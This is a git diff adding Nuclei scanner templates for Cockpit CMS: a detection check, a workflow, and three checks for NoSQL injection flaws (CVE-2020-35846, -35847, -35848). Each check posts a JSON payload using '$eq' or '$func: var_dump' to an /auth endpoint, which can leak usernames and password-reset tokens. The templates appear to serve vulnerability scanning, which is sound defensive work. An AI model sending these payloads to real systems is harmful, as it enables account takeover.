diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml new file mode 100644 index 0000000000..35f6119a3c --- /dev/null +++ b/cves/2020/CVE-2020-35846.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-35846 + +info: + name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check + author: dwisiswant0 + severity: critical + description: | + Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. + The $eq operator matches documents where the value of a field equals the specified value. + reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ + tags: cve,cve2020,nosqli,sqli + +requests: + - method: POST + path: + - "{{BaseURL}}/auth/check" + headers: + Content-Type: application/json + body: | + { + "auth": { + "user": { + "$eq": "admin" + }, + "password": [ + 0 + ] + } + } + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "password_verify() expects parameter" \ No newline at end of file diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml new file mode 100644 index 0000000000..63bd5e764d --- /dev/null +++ b/cves/2020/CVE-2020-35847.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-35847 + +info: + name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword + author: dwisiswant0 + severity: critical + description: | + resetpassword method of the Auth controller, + which is responsible for changing the user password using the reset token. + reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ + tags: cve,cve2020,nosqli,sqli + +requests: + - method: POST + path: + - "{{BaseURL}}/auth/requestreset" + headers: + Content-Type: application/json + body: | + { + "user": { + "$func": "var_dump" + } + } + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"' \ No newline at end of file diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml new file mode 100644 index 0000000000..774a716548 --- /dev/null +++ b/cves/2020/CVE-2020-35848.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-35848 + +info: + name: Cockpit prior to 0.12.0 NoSQL injection in /auth/newpassword + author: dwisiswant0 + severity: critical + description: | + newpassword method of the Auth controller, + which is responsible for displaying the user password reset form. + reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ + tags: cve,cve2020,nosqli,sqli + +requests: + - method: POST + path: + - "{{BaseURL}}/auth/newpassword" + headers: + Content-Type: application/json + body: | + { + "token": { + "$func": "var_dump" + } + } + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' \ No newline at end of file diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml new file mode 100644 index 0000000000..30bf745acc --- /dev/null +++ b/technologies/cockpit-detect.yaml @@ -0,0 +1,15 @@ +id: cockpit-detect + +info: + name: Detect Agentejo Cockpit + author: dwisiswant0 + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/login" + matchers: + - type: word + words: + - "Authenticate Please!" diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml new file mode 100644 index 0000000000..fb5435c3fe --- /dev/null +++ b/workflows/cockpit-workflow.yaml @@ -0,0 +1,14 @@ +id: cockpit-workflow + +info: + name: Agentejo Cockpit Security Checks + author: dwisiswant0 + description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. + tags: workflow + +workflows: + - template: technologies/cockpit-detect.yaml + subtemplates: + - template: cve/2020/CVE-2020-35846.yaml + - template: cve/2020/CVE-2020-35847.yaml + - template: cve/2020/CVE-2020-35848.yaml \ No newline at end of file